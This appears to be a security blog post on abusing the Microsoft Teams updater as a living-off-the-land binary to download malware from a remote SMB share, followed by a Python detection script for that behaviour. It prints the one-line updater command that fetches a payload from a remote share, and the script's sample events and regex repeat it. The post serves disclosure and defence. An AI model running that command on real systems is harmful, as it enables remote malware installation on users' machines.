Attackers can abuse the Microsoft Teams Updater to install malware

The updater of Microsoft Teams can be misused by attackers as a Living off the Land Binary (LoLBin) to install malware remotely on a user's system. Microsoft's efforts to eliminate this vulnerability work to some degree, but ultimately cannot stop attackers from using Teams to place and run their malware.


I came across this issue in two places. Bleeping Computer has put it all together in this article. In addition, the person who found the vulnerability posted it on Twitter.

According to Bleeping Computer, a vulnerability in Microsoft Teams had already been discovered and described a year ago. The update mechanism, as implemented in the Teams desktop application at that time, allowed the download and execution of arbitrary files on the system. Reegun Jayapaul, now Lead Threat Architect for SpiderLabs at Trustwave, had also found the issue in 2019 and published technical details. Microsoft then released a patch to fix the exploitability of this vulnerability.

Modified attack possible

Now security researcher Reegun Richard has discovered the vulnerability mentioned in the above tweet. The patch previously made available for Teams was intended to restrict the ability to update via a URL. The updater still allows local connections via a share or local folder for product updates. When the security researcher examined this, he discovered that the restrictions added by the patch could easily be circumvented by pointing the updater to a remote SMB share. Here is the command:

Update.exe --update=\\remoteserver\payloadFolder

Reegun writes that the vulnerability allows a malicious actor to use the MS Teams Updater to download any binary file or payload. This technique is commonly referred to as "Living Off the Land" and is particularly dangerous because it uses known, legitimate software to download malware.
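Because the abuse described above leaves a very recognisable trace (the Teams Squirrel updater, Update.exe, started with an --update= argument that points at a UNC path), a defender can hunt for it in process-creation telemetry. The following triage helper is an added example written for this post; it is not code from Bleeping Computer, from Reegun's write-up or from Microsoft. It assumes Sysmon-style process-creation records with "Image" and "CommandLine" fields, assumes the per-user install path %LOCALAPPDATA%\Microsoft\Teams\Update.exe, and uses a severity scale (high for a remote share, medium for a URL, low for a local path) that is my own choice; the sample events are constructed, not captured from a real host.

```python
import re
from typing import Optional

# Constructed sample process-creation records (Sysmon Event ID 1 style).
# Hosts, user names and paths are hypothetical.
SAMPLE_EVENTS = [
    {   # normal Teams start via the Squirrel updater, no --update argument
        "Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
        "CommandLine": r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"',
    },
    {   # the pattern from the post: update source is a remote SMB share
        "Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
        "CommandLine": r"Update.exe --update=\\remoteserver\payloadFolder",
    },
    {   # local folder as update source: allowed by design, still worth a look
        "Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
        "CommandLine": r"Update.exe --update=C:\Users\alice\Downloads\staged",
    },
    {   # unrelated binary with a similar argument: out of scope for this rule
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r"notepad.exe --update=\\fileserver\share",
    },
]

# Matches "--update=<value>" or "--update <value>", with optional quotes.
_UPDATE_ARG = re.compile(r'--update[=\s]+"?([^"\s]+)', re.IGNORECASE)


def extract_update_target(command_line: str) -> Optional[str]:
    """Return the value passed to --update, or None if the flag is absent."""
    match = _UPDATE_ARG.search(command_line)
    return match.group(1) if match else None


def classify_update_target(target: str) -> str:
    """Severity of an update source (assumed scale: high / medium / low)."""
    if target.startswith("\\\\") or target.startswith("//"):
        # UNC path: the updater fetches the payload from a remote SMB share,
        # which is exactly the patch bypass described in the post.
        return "high"
    if re.match(r"^[a-z][a-z0-9+.\-]*://", target, re.IGNORECASE):
        # URL: updates via URL are what the earlier patch was meant to restrict.
        return "medium"
    # Local path: accepted by the updater by design; confirm where it came from.
    return "low"


def triage_event(event: dict) -> Optional[dict]:
    """Return a finding for a Teams Update.exe launch with --update, else None."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\update.exe"):
        return None
    if "\\microsoft\\teams\\" not in image:
        # Assumption: only the Teams copy of the Squirrel updater is in scope.
        return None
    target = extract_update_target(event.get("CommandLine", ""))
    if target is None:
        return None
    return {"image": event["Image"], "target": target,
            "severity": classify_update_target(target)}


def triage_all(events: list) -> list:
    """Run triage over a batch of events and keep only the findings."""
    findings = []
    for event in events:
        finding = triage_event(event)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in triage_all(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] {finding['image']} -> {finding['target']}")
```

The rule deliberately keys on the Teams install path rather than on the file name alone, because Update.exe is the generic Squirrel updater name and other Electron applications ship a file of the same name; a broader rule would swap the path check for a signer or hash check from the EDR's own fields.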


Details can be found in the two linked articles. In general, I am uneasy about Microsoft Teams from a security point of view, as you may read in my old blog post Microsoft Teams and its security.
